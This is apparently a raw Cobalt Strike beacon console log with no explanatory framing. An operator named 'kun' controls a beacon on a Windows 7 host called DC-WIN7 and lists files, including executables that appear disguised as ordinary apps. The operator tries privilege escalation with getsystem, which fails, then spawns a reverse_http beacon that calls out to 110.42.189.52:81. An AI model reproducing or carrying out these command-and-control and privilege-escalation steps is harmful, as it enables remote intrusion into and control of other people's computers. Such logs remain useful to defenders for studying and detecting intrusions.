01/09 14:16:16 UTC [metadata] 36.112.187.40 <- 192.168.178.23; computer: DC-WIN7; user: Tb; process: hw.exe; pid: 3660; os: Windows; version: 6.1; build: 7601; beacon arch: x64 (x64)
01/09 14:16:09 UTC [task] <T1029> Tasked beacon to sleep for 30s (30% jitter)
01/09 14:16:09 UTC [note] Bid: 700712618  NT: 6.1
01/09 14:16:35 UTC [input] <kun> sleep 0
01/09 14:16:35 UTC [task] <T1029> Tasked beacon to become interactive
01/09 14:17:09 UTC [checkin] host called home, sent: 32 bytes
01/09 14:17:57 UTC [input] <kun> ls
01/09 14:17:57 UTC [task] <> Tasked beacon to list files in .
01/09 14:18:14 UTC [checkin] host called home, sent: 19 bytes
01/09 14:18:14 UTC [output]
C:\Users\Tb\Downloads\*
D	0	01/09/2024 22:15:52	.
D	0	01/09/2024 22:15:52	..
F	19456	01/08/2024 16:55:00	artifact_x64.exe
F	282	07/03/2023 16:23:33	desktop.ini
F	19456	01/08/2024 16:35:13	dingding.exe
F	19456	01/09/2024 22:16:00	hw.exe
F	55853327	07/03/2023 16:39:43	windows6.1-kb4474419-v3-x64_b5614c6cea5cb4e198717789633dca16308ef79c.msu


01/09 14:18:29 UTC [input] <kun> getprivs
01/09 14:18:29 UTC [task] <T1134> Tasked beacon to enable privileges
01/09 14:18:29 UTC [checkin] host called home, sent: 755 bytes
01/09 14:18:29 UTC [output]
received output:
SeShutdownPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege


01/09 14:18:43 UTC [input] <kun> getsystem
01/09 14:18:43 UTC [task] <T1134> Tasked beacon to get SYSTEM
01/09 14:18:43 UTC [checkin] host called home, sent: 3239 bytes
01/09 14:18:43 UTC [output]
received output:
getsystem failed.

01/09 14:18:45 UTC [input] <kun> 
01/09 14:18:45 UTC [error] Unknown command: 
01/09 14:18:45 UTC [input] <kun> 
01/09 14:18:45 UTC [error] Unknown command: 
01/09 14:19:15 UTC [input] <kun> getuid
01/09 14:19:15 UTC [task] <> Tasked beacon to get userid
01/09 14:19:35 UTC [checkin] host called home, sent: 8 bytes
01/09 14:19:36 UTC [output]
You are DC-WIN7\Tb

01/09 14:20:11 UTC [input] <kun> spawn http
01/09 14:20:12 UTC [task] <T1093> Tasked beacon to spawn (x64) windows/beacon_http/reverse_http (110.42.189.52:81)
01/09 14:20:14 UTC [checkin] host called home, sent: 295944 bytes
